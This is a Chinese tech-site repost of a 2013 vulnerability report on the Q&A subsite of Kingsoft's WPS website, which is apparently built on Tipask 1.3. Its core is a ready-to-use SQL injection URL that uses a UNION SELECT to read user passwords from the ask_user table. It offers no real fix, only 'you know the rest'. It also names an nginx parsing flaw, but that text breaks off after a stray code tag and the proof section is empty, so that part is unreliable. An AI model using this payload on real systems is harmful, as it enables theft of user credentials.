当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

金山WPS官网知道子站注射及解析漏洞

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:



详细说明:

此站为金山WPS官网的一个问答系统,由tipask1.3搭建,存在SQL注射漏洞
 
SQL:
?question/ajaxsearch/123%27union%20select%201,2,3,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19%20from%20ask_user%23%27%
 
还有nginx解析漏洞:<code>>
漏洞证明:
 
 
 
 
 
修复方案:
具体你懂的
作者: 数据流
,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1